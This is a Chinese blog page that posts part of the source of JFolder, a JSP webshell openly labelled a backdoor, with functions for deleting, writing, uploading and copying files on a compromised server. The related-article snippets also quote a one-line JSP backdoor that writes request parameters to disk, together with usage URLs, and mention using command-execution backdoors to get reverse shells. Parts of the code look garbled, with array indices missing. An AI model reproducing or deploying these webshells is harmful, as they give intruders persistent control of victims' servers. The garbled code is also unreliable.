JFolder_JSP后门代码

最新推荐文章于 2020-12-21 21:31:23 发布
最新推荐文章于 2020-12-21 21:31:23 发布
阅读量1k 收藏 1
点赞数
分类专栏: Java 文章标签: jsp 后门

JFolder_JSP后门代码(B)

return sRet;
}

public String deleteFile(String path, String curUri, String[] files2Delete) {
String sRet = "";
File tmpFile = null;

try {
for (int i = 0; i < files2Delete.length; i ++) {
   tmpFile = new File(files2Delete);
   if (! tmpFile.delete()) {
    sRet += "<font color=\"red\">删除\"" + files2Delete + "\"失败</font><br>\n";
   }
}

if (sRet.equals("")) {
   sRet = "删除成功,正在返回,请稍候……\n";
   sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";
}
} catch (SecurityException e) {
sRet = "<font color=\"red\">安全问题,没有权限执行该操作</font>\n";
}

return sRet;
}

public String saveAs(String path, String curUri, String fileContent) {
String sRet = "";
File file = null;
FileWriter fileWriter = null;

try {
file = new File(path);

if (file.createNewFile()) {
   fileWriter = new FileWriter(file);
   fileWriter.write(fileContent);
   fileWriter.close();
   
   sRet = "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "&fsAction=open" + "\" />";
} else {
   sRet = "<font color=\"red\">文件\"" + path + "\"已经存在</font>";
}
} catch (IOException e) {
sRet = "<font color=\"red\">创建文件\"" + path + "\"失败</font>";
}

return sRet;
}


public String uploadFile(ServletRequest request, String path, String curUri) {
String sRet = "";
File file = null;
InputStream in = null;

path = pathConvert(path);

try {
in = request.getInputStream();

byte[] inBytes = new byte[request.getContentLength()];
int nBytes;
int start = 0;
int end = 0;
int size = 1024;
String token = null;
String filePath = null;

//
// 把输入流读入一个字节数组
//
while ((nBytes = in.read(inBytes, start, size)) != -1) {
   start += nBytes;
}

in.close();
//
// 从字节数组中得到文件分隔符号
//
int i = 0;
byte[] seperator;

while (inBytes != 13) {
   i ++;
}

seperator = new byte;

for (i = 0; i < seperator.length; i ++) {
   seperator = inBytes;
}

//
// 得到Header部分
//
String dataHeader = null;
i += 3;
start = i;
while (! (inBytes == 13 && inBytes[i + 2] == 13)) {
   i ++;
}
end = i - 1;
dataHeader = new String(inBytes, start, end - start + 1);

//
// 得到文件名
//
token = "filename=\"";
start = dataHeader.indexOf(token) + token.length();
token = "\"";
end = dataHeader.indexOf(token, start) - 1;
filePath = dataHeader.substring(start, end + 1);
filePath = pathConvert(filePath);
String fileName = filePath.substring(filePath.lastIndexOf("/") + 1);

//
// 得到文件内容开始位置
// 
i += 4;
start = i;

/*
boolean found = true; 
byte[] tmp = new byte[seperator.length];
while (i <= inBytes.length - 1 - seperator.length) {

   for (int j = i; j < i + seperator.length; j ++) { 
    if (seperator[j - i] != inBytes[j]) {
     found = false;
     break;
    } else
     tmp[j - i] = inBytes[j];
   }
   
   if (found)
    break;
   
   i ++;
}*/

//
// 偷懒的办法
//
end = inBytes.length - 1 - 2 - seperator.length - 2 - 2;

//
// 保存为文件
//
File newFile = new File(path + fileName);
newFile.createNewFile();
FileOutputStream out = new FileOutputStream(newFile);

//out.write(inBytes, start, end - start + 1);
out.write(inBytes, start, end - start + 1);
out.close();

sRet = "<script language=\"javascript\">\n";
sRet += "alert(\"文件上传成功" + fileName + "\");\n";
sRet += "</script>\n";
} catch (IOException e) {
sRet = "<script language=\"javascript\">\n";
sRet += "alert(\"文件上传失败\");\n";
sRet += "</script>\n";
}

sRet += "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "\" />";
return sRet;
}

public boolean fileCopy(String srcPath, String dstPath) {
boolean bRet = true;

try {
FileInputStream in = new FileInputStream(new File(srcPath));
FileOutputStream out = new FileOutputStream(new File(dstPath));
byte[] buffer = new byte[1024];
int nBytes;

while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
   out.write(buffer, 0, nBytes);
}

in.close();
out.close();
} catch (IOException e) {
bRet = false;
}

return bRet;
}

public String getFileNameByPath(String path) {
String sRet = "";

path = pathConvert(path);

if (path.lastIndexOf("/") != -1) {
sRet = path.substring(path.lastIndexOf("/") + 1);
} else {
sRet = path;
}

return sRet;
}

毛豆粉
关注
专栏目录
jFolder webshell
03-07
jFolder 直接丢到项目下就可以用,jsp webshell工具,包含文件管理,数据库连接,shell指令输入等功能
JSP一句话后门
01-08
<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes()); %> 使用方法: 提交url! jsp?f=1.txt” target=”_blank”>http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld 然后:http://www.whitehouse.net
jsp后门
收集盒 Book box
08-30 4490
by 园长MM  一:执行系统命令: 无回显执行系统命令: ? 1 "i"));%> 请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls 执行之后不会有任何回显,用来反弹个shell很方便。 有回显带密码验证的:
转载:JSP后门代码(原出处CSDN)
11-27 341
通过 jar cvf aa.war . 打包成aa.war文件 通过tomcat后台上传到服务器即可 试用了一下,功能很全面。 对数据库密码的获取没搞懂,不知道如何获取到sa的密码。 该后门的密码,我自己改成了用户s3密码s3 代码 <%@pageimport="java.util.*,java.io.*,java.sql.*,java.util.z...
JSP全能管理系统1.0-update08.1.10
Quantum Intelligence
10-09 8781
功能如下文件: 复制  移动 修改日期 删除 编辑 下载 上传 新建目录: 复制 移动 修改日期 打包zip 新建系统: 查看系统信息  环境变量信息 容器信息杂项: 运行(系统命令/文件)  API类反射 扫描远程机器端口  开启本机HTTP代理数据库: 查看数据库信息  查看数据库函数 查看数据库存储过程  执行SQL其中开启 HTTP代理由为特出~ 呵呵 只要别人一运
JSP.rar_JSp代码_jsp
最新发布
09-24
在提供的`JSP.rar`压缩包中,我们可以找到一些有助于初学者入门的JSP代码。这些源代码通常包含实际的JSP页面、相关的JavaBean(如果使用的话)和其他支持文件,如CSS和JavaScript。通过学习和分析这些源代码,新手...
JSP网站开发代码_jsp网站_jsp网站代码_
09-30
JSP(Java Server Pages)网站开发】是Java平台上的动态网页技术,它允许开发者将静态HTML与动态Java代码结合,以实现服务器端的数据处理和交互功能。在JSP网站开发中,主要涉及以下几个核心知识点: 1. **JSP...
jsp.rar_jsp_jsp 登录_jsp 登录 代码_servlet注册_注册
09-19
本压缩包“jsp.rar”包含了一套利用JSP和Servlet实现用户注册与登录功能的代码示例,适用于初学者理解和学习。 JSP是一种服务器端的脚本语言,它允许开发者在HTML页面中嵌入Java代码,从而简化了Web应用的开发。而...
jsp源程序.rar_jspJava源码_jsp程序代码_jsp编程
09-22
这个子文件夹可能包含了多个JSP源文件,每个文件都是一个独立的JSP页面,可以查看和学习如何编写和组织JSP代码。开发者可以从中学习到JSP的各个组成部分以及如何在实际项目中应用JSP。 **JSP编程的最佳实践**: - ...
JFolderjsp webshell)
06-23
jsp环境下的webshell,无密码
两个jsp后门
04-02
包含两个jsp后门,第一个被分解成了java代码用于学习,完善了其在线命令功能(原版本不能收到输出结果)
JFolder.rar后门webshell
06-24
JFolder jsp 后门 webshell,很是强大!
JFolder web应用部署
06-19
JFolder is a web-based application development and management tool. It allows users to create applications through a web browser without writing any code. The current release includes an implementation of the Pet Store written without code.
faq.rar_FAQ_jsp faq_jsp 问答_jsp代码_问答
09-23
以上就是关于"faq.rar_FAQ_jsp faq_jsp 问答_jsp代码_问答"项目的关键知识点。这个项目展示了如何利用JSP和数据库连接来创建一个互动的在线问答系统,涉及到了前端界面、后端处理、数据库交互等多个方面。在实际开发...
一个JSP大马的源码
weixin_30763455的博客
08-07 1360
<% /** JFolder V0.9 windows platform @Filename: JFolder.jsp @Description: 一个简单的系统文件目录显示程序,类似于资源管理器,提供基本的文件操作,不过功能弱多了。 @Author: Steven Cee @Email : cqq1978@Gmail.com @Bugs : 下载时,中文文件名无法正常显示 */ %&...
系统文件目录显示程序JFolder.jsp
王月莹的专栏
07-14 3090
这个版本主要是兼容了Unix、Linux等操作系统,真正的不再受系统平台的限制。 在0.9测试版发布以后,很多朋友都给了我很好的意见和建议, 对于日常的应用,这个版本应该足够了 在下一个版本中,会增加更多的功能。 在此感谢 Boris von Loesch,古典Lam,CitySuSu等人的帮助 <% /** JFileMan V1.0windows platform @File
java jsp 木马_Jsp后门Jsp 一句话木马后门详解
weixin_39692623的博客
12-21 888
public static String getPassword() throws IOException {return "023";}String cs = "UTF-8";String encoding(String s) throws Exception {return new String(s.getBytes("ISO-8859-1"), cs);}Connection getConn...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值